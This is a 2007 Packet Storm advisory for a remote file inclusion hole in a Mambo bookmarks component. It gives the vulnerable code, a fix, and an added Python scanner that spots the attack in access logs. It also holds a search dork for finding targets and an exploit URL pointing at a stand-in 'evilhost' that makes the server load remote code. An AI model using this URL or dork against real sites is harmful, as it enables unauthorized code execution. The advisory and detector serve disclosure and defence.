mambobm.rfi.txt

14 Aug 2007 00:00:00, reported by vitux. Type: packetstorm. Source: packetstormsecurity.com

Application: Bookmarks, a Mambo component. The URL variable $mosConfig_absolute_path is not sanitized; the exploit works with register_globals=on in components/com_bookmarks/bookmarks_export.php. Exploit dork: com_bookmarks


Code
```text
Application : Bookmarks - mambo Component

URL :
http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip

Variable $mosConfig_absolute_path not sanitized: exploit works with
register_globals=on
in components/com_bookmarks/bookmarks_export.php on lines 22, 27, 29

require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/'
. $mosConfig_lang . '.php');
include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php');

Exploit:
~~~~~~~~

dork: "com_bookmarks"

http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost

Fix
~~~~

Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

Discovered By : vitux
Thanks To : #[email protected], #[email protected], #batamhacker@dal.net, #[email protected]
special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang subang sadaya, pokona mah kabeh lah
mail : [email protected], [email protected]

# cilacap 12th august 2007
```
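As an added example (not from the advisory or the Mambo project), the following Python log scanner flags requests that override `$mosConfig_absolute_path` or `$mosConfig_lang` with a remote URL or a PHP stream wrapper, which is the pattern the exploit URL above relies on. The access-log lines are constructed; the script path and parameter names come from the advisory.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample Apache access-log lines (not real traffic); the path and
# parameter names are the ones named in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Aug/2007:10:01:02 +0000] "GET /components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://example.invalid/sh HTTP/1.1" 200 512
203.0.113.9 - - [14/Aug/2007:10:02:15 +0000] "GET /components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http%3A%2F%2Fexample.invalid%2Fsh HTTP/1.1" 200 512
198.51.100.2 - - [14/Aug/2007:10:03:44 +0000] "GET /index.php?option=com_bookmarks&task=export HTTP/1.1" 200 2048
198.51.100.7 - - [14/Aug/2007:10:04:01 +0000] "GET /components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Globals that bookmarks_export.php concatenates into include paths; with
# register_globals=on a query-string parameter of the same name sets them.
SUSPECT_PARAMS = {"mosconfig_absolute_path", "mosconfig_lang"}
# A remote URL (scheme://host or protocol-relative //host) or a PHP stream wrapper.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//|^(?:php|data|expect|phar):", re.I)


def rfi_indicator(target):
    """Return (param, decoded_value) for the first include-path override that
    points at a remote source or stream wrapper, else None."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in SUSPECT_PARAMS:
            continue
        decoded = unquote(value).strip()  # parse_qsl decoded once; catch double encoding
        if REMOTE_RE.search(decoded) or "://" in decoded:
            return name, decoded
    return None


def scan_log(text):
    """Scan access-log text and return one record per request that overrides an
    include path with a remote location."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = rfi_indicator(m["target"])
        if found:
            hits.append({"ip": m["ip"], "ts": m["ts"], "param": found[0],
                         "value": found[1], "status": m["status"]})
    return hits
```

A local path such as `/var/www/html` is not flagged, so the rule stays quiet on legitimate overrides and fires only on remote or wrapper values.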

Vulners AI Score: 7.4 (High risk)